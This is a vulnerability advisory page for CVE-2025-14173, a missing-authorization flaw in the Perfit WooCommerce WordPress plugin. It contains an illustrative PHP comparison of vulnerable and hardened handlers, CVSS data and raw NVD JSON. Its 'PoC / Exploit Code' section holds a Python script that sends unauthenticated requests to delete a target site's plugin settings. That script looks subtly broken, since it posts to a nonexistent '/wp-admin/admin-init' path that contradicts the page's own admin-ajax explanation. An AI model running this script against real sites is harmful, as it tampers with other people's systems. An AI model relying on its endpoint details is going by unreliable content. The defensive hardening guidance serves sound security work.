Security Vulnerability Report
CVE-2025-14173 CVSS 5.3 MEDIUM

CVE-2025-14173

Published: 2026-01-14 07:16:12
Last Modified: 2026-04-15 00:35:42

Description

The Perfit WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.1. This is due to missing authorization checks on the `logout` function called via the `actions` function hooked to `admin_init`. This makes it possible for unauthenticated attackers to delete arbitrary plugin settings via the `action` parameter.
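The weakness class here (CWE-862, missing authorization) follows from a common WordPress mistake: treating the `admin_init` hook as proof that the caller is a privileged user. `admin_init` also fires for requests to `admin-ajax.php`, which unauthenticated visitors can reach, so a handler that reads `$_GET['action']` and mutates options without its own checks is exposed to anyone. The following PHP is an added illustration written for this page, not the plugin's own code: the hook, action and option names (`example_logout`, `example_api_key`, and so on) are hypothetical. It shows the unguarded pattern beside a hardened version that requires both a capability and a nonce before deleting settings.

```php
<?php
// Added illustration, not code from the Perfit WooCommerce plugin.
// Hook, action, option and text-domain names below are hypothetical.

// Vulnerable pattern: the handler trusts admin_init as evidence of privilege.
// admin_init runs for admin-ajax.php requests too, so nothing here verifies
// who is calling, and any visitor can trigger the option deletion.
function example_actions_vulnerable() {
    if ( isset( $_GET['action'] ) && 'example_logout' === $_GET['action'] ) {
        example_logout();
    }
}
// (deliberately not hooked; shown only for comparison)

// Hardened pattern: check a capability and a nonce before any state change.
function example_actions_hardened() {
    if ( ! isset( $_GET['action'] ) || 'example_logout' !== $_GET['action'] ) {
        return;
    }
    // Authorization: only users who may manage site options can reset settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'You are not allowed to do that.', 'example' ),
            '',
            array( 'response' => 403 )
        );
    }
    // Intent check: the nonce ties the request to a link/form the plugin
    // rendered for this user, so a crafted URL cannot trigger the action.
    check_admin_referer( 'example_logout_action', '_wpnonce' );

    example_logout();
    wp_safe_redirect( admin_url( 'admin.php?page=example-settings&reset=1' ) );
    exit;
}
add_action( 'admin_init', 'example_actions_hardened' );

// The state change both handlers guard: removes stored credentials/settings.
function example_logout() {
    delete_option( 'example_api_key' );
    delete_option( 'example_settings' );
}

// The settings page must emit a matching nonce so the hardened handler accepts
// the request; wp_nonce_url() appends the _wpnonce query argument.
function example_logout_link() {
    $url = wp_nonce_url(
        add_query_arg( 'action', 'example_logout', admin_url( 'admin.php?page=example-settings' ) ),
        'example_logout_action',
        '_wpnonce'
    );
    echo '<a href="' . esc_url( $url ) . '">' . esc_html__( 'Disconnect', 'example' ) . '</a>';
}
```

Both checks matter: `current_user_can()` alone still lets a logged-in administrator be tricked into clicking a crafted link (CSRF), and a nonce alone does not stop a low-privilege account that can obtain one. When reviewing a plugin, look for every `admin_init` (and `init`, `admin_post_*`, `wp_ajax_nopriv_*`) callback that branches on a request parameter and confirm it performs its own authorization before writing or deleting options.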

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Perfit WooCommerce plugin <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-14173 PoC - Perfit WooCommerce Missing Authorization
# Target: WordPress site with Perfit WooCommerce plugin <= 1.0.1


def exploit_cve_2025_14173(target_url):
    """
    Exploit missing authorization in Perfit WooCommerce plugin
    Allows unauthenticated deletion of plugin settings via action parameter
    """
    # Target the admin_init hook with logout action
    exploit_url = f"{target_url.rstrip('/')}/wp-admin/admin-init"

    # Payload to trigger logout function and delete plugin settings
    payload = {
        'action': 'perfit_logout'  # Triggers the vulnerable logout function
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-14173...")
    print(f"[*] Sending request to: {exploit_url}")

    try:
        # Send POST request without authentication
        response = requests.post(exploit_url, data=payload, timeout=30)

        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")

        if response.status_code == 200:
            print("[+] Request sent successfully - plugin settings may be deleted")
            print("[*] Verify by checking plugin settings page")
        else:
            print("[-] Unexpected response")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_cve_2025_14173(target)
```

References

https://plugins.trac.wordpress.org/browser/perfit-woocommerce/tags/1.0.1/includes/class-wcp-settings-tab.php#L102
https://plugins.trac.wordpress.org/browser/perfit-woocommerce/trunk/includes/class-wcp-settings-tab.php#L102
https://www.wordfence.com/threat-intel/vulnerabilities/id/cb141b46-2585-4b58-8d91-0cdb275348a1?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14173",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-14T07:16:11.997",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Perfit WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.1. This is due to missing authorization checks on the `logout` function called via the `actions` function hooked to `admin_init`. This makes it possible for unauthenticated attackers to delete arbitrary plugin settings via the `action` parameter."
      },
      {
        "lang": "es",
        "value": "El plugin Perfit WooCommerce para WordPress es vulnerable a la falta de autorización en todas las versiones hasta la 1.0.1, inclusive. Esto se debe a la falta de comprobaciones de autorización en la función 'logout' llamada a través de la función 'actions' enganchada a 'admin_init'. Esto hace posible que atacantes no autenticados eliminen configuraciones arbitrarias del plugin a través del parámetro 'action'."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/perfit-woocommerce/tags/1.0.1/includes/class-wcp-settings-tab.php#L102",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/perfit-woocommerce/trunk/includes/class-wcp-settings-tab.php#L102",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cb141b46-2585-4b58-8d91-0cdb275348a1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```